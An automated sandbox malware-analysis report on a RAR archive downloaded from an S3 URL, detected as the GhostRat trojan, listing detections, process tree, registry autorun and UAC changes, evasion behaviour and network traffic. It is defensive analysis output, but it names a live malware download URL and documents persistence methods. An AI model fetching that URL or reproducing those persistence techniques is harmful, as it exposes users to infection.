Edit tour

Windows Analysis Report
https://tom18860.s3.ap-northeast-1.amazonaws.com/%E6%9F%A5%E8%AF%A2%E6%96%87%E4%BB%B6.rar

Overview

General Information

Sample URL:	https://tom18860.s3.ap-northeast-1.amazonaws.com/%E6%9F%A5%E8%AF%A2%E6%96%87%E4%BB%B6.rar
Analysis ID:	1585773
Infos:

Detection

GhostRat

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected GhostRat

Creates an undocumented autostart registry key

Disables UAC (registry)

Sigma detected: Suspicious Environment Variable Has Been Registered

Tries to detect sandboxes / dynamic malware analysis system (QueryWinSAT)

Uses regedit.exe to modify the Windows registry

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for available system drives (often done to infect USB drives)

Contains long sleeps (>= 3 min)

Creates files inside the system directory

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Installs a global mouse hook

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Common Autorun Keys Modification

Stores files to the Windows start menu directory

Stores large binary data to the registry

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 2888 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7000 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=1928,i,8402674929247263864,13808204845738003949,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

svchost.exe (PID: 6924 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

chrome.exe (PID: 6876 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tom18860.s3.ap-northeast-1.amazonaws.com/%E6%9F%A5%E8%AF%A2%E6%96%87%E4%BB%B6.rar" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

OpenWith.exe (PID: 6156 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)

rundll32.exe (PID: 7564 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)

7zG.exe (PID: 7660 cmdline: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Downloads\" -an -ai#7zMap20622:68:7zEvent10885 MD5: 50F289DF0C19484E970849AAC4E6F977)

7zG.exe (PID: 7788 cmdline: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Downloads\????\" -spe -an -ai#7zMap30101:68:7zEvent28394 MD5: 50F289DF0C19484E970849AAC4E6F977)

20250108.exe (PID: 7988 cmdline: "C:\Users\user\Downloads\????\?????\20250108.exe" MD5: B54F6F7A63A0E20DE1A80D1C8AAA2882)

20250108.exe (PID: 8080 cmdline: "C:\Users\user\Downloads\????\?????\20250108.exe" MD5: B54F6F7A63A0E20DE1A80D1C8AAA2882)

regedit.exe (PID: 3840 cmdline: regedit /s C:\Users\Public\Documents\1.reg MD5: 999A30979F6195BF562068639FFC4426)

powershell.exe (PID: 636 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

20250108.exe (PID: 1500 cmdline: "C:\Users\user\Downloads\????\?????\20250108.exe" MD5: B54F6F7A63A0E20DE1A80D1C8AAA2882)

20250108.exe (PID: 3880 cmdline: "C:\Users\user\Downloads\????\?????\20250108.exe" MD5: B54F6F7A63A0E20DE1A80D1C8AAA2882)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000013.00000002.2458700321.000001ABB57C7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
0000001F.00000002.2455990458.000001F731F10000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
0000001F.00000002.2455552559.000001F731E30000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000013.00000002.2456588504.000001ABB4A50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Environment Variable Has Been Registered

Source: Registry Key set

Author: Nasreddine Bencherchali (Nextron Systems): Data: Details: C:\Users\Public\Documents\update.bat, EventID: 13, EventType: SetValue, Image: C:\Windows\regedit.exe, ProcessId: 3840, TargetObject: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment\UserInitMprLogonScript

Sigma detected: Common Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name): Data: Details: C:\Users\Public\Documents\update.bat, EventID: 13, EventType: SetValue, Image: C:\Windows\regedit.exe, ProcessId: 3840, TargetObject: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment\UserInitMprLogonScript

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , ProcessId: 636, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6924, ProcessName: svchost.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Source: unknown	HTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.73.254:443 -> 192.168.2.16:49738 version: TLS 1.2

Source: C:\Users\user\Downloads\????\?????\20250108.exe	File opened: z:
Source: C:\Users\user\Downloads\????\?????\20250108.exe	File opened: x:
Source: C:\Users\user\Downloads\????\?????\20250108.exe	File opened: v:
Source: C:\Users\user\Downloads\????\?????\20250108.exe	File opened: t:
Source: C:\Users\user\Downloads\????\?????\20250108.exe	File opened: r:
Source: C:\Users\user\Downloads\????\?????\20250108.exe	File opened: p:
Source: C:\Users\user\Downloads\????\?????\20250108.exe	File opened: n:
Source: C:\Users\user\Downloads\????\?????\20250108.exe	File opened: l:
Source: C:\Users\user\Downloads\????\?????\20250108.exe	File opened: j:
Source: C:\Users\user\Downloads\????\?????\20250108.exe	File opened: h:
Source: C:\Users\user\Downloads\????\?????\20250108.exe	File opened: f:
Source: C:\Users\user\Downloads\????\?????\20250108.exe	File opened: b:
Source: C:\Users\user\Downloads\????\?????\20250108.exe	File opened: y:
Source: C:\Users\user\Downloads\????\?????\20250108.exe	File opened: w:
Source: C:\Users\user\Downloads\????\?????\20250108.exe	File opened: u:
Source: C:\Users\user\Downloads\????\?????\20250108.exe	File opened: s:
Source: C:\Users\user\Downloads\????\?????\20250108.exe	File opened: q:
Source: C:\Users\user\Downloads\????\?????\20250108.exe	File opened: o:
Source: C:\Users\user\Downloads\????\?????\20250108.exe	File opened: m:
Source: C:\Users\user\Downloads\????\?????\20250108.exe	File opened: k:
Source: C:\Users\user\Downloads\????\?????\20250108.exe	File opened: i:
Source: C:\Users\user\Downloads\????\?????\20250108.exe	File opened: g:
Source: C:\Users\user\Downloads\????\?????\20250108.exe	File opened: e:
Source: C:\Users\user\Downloads\????\?????\20250108.exe	File opened: c:
Source: C:\Users\user\Downloads\????\?????\20250108.exe	File opened: [:

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData

Source: chrome.exe

Memory has grown: Private usage: 18MB later: 28MB

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108

Source: global traffic	DNS traffic detected: DNS query: tom18860.s3.ap-northeast-1.amazonaws.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ow1.res.office365.com

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown	HTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.73.254:443 -> 192.168.2.16:49738 version: TLS 1.2

Source: C:\Users\user\Downloads\????\?????\20250108.exe

Windows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dll

System Summary

Uses regedit.exe to modify the Windows registry

Source: C:\Users\user\Downloads\????\?????\20250108.exe

Process created: C:\Windows\regedit.exe regedit /s C:\Users\Public\Documents\1.reg

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: classification engine

Classification label: mal68.troj.evad.win@31/22@5/111

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: C:\Users\user\Downloads\????\?????\20250108.exe	Mutant created: NULL
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Mutant created: \Sessions\1\BaseNamedObjects\2025. 1. 7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_762381681
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Z2omPA1C
Source: C:\Windows\System32\OpenWith.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uumph0am.hmj.ps1

Source: C:\Windows\System32\OpenWith.exe

File read: C:\Users\desktop.ini

Source: C:\Windows\System32\OpenWith.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=1928,i,8402674929247263864,13808204845738003949,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tom18860.s3.ap-northeast-1.amazonaws.com/%E6%9F%A5%E8%AF%A2%E6%96%87%E4%BB%B6.rar"
Source: unknown	Process created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=1928,i,8402674929247263864,13808204845738003949,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: unknown	Process created: C:\Program Files\7-Zip\7zG.exe "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Downloads\" -an -ai#7zMap20622:68:7zEvent10885
Source: unknown	Process created: C:\Program Files\7-Zip\7zG.exe "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Downloads\????\" -spe -an -ai#7zMap30101:68:7zEvent28394
Source: unknown	Process created: C:\Users\user\Downloads\????\?????\20250108.exe "C:\Users\user\Downloads\????\?????\20250108.exe"
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process created: C:\Users\user\Downloads\????\?????\20250108.exe "C:\Users\user\Downloads\????\?????\20250108.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process created: C:\Windows\regedit.exe regedit /s C:\Users\Public\Documents\1.reg
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process created: C:\Windows\regedit.exe regedit /s C:\Users\Public\Documents\1.reg
Source: unknown	Process created: C:\Users\user\Downloads\????\?????\20250108.exe "C:\Users\user\Downloads\????\?????\20250108.exe"
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process created: C:\Users\user\Downloads\????\?????\20250108.exe "C:\Users\user\Downloads\????\?????\20250108.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Windows\System32\OpenWith.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: twinui.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: actxprxy.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.ui.appdefaults.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.ui.immersive.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: uiautomationcore.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dui70.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: duser.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: bcp47mrm.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: uianimation.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dxcore.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dcomp.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: oleacc.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.ui.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windowmanagementapi.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: inputhost.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windowscodecs.dll
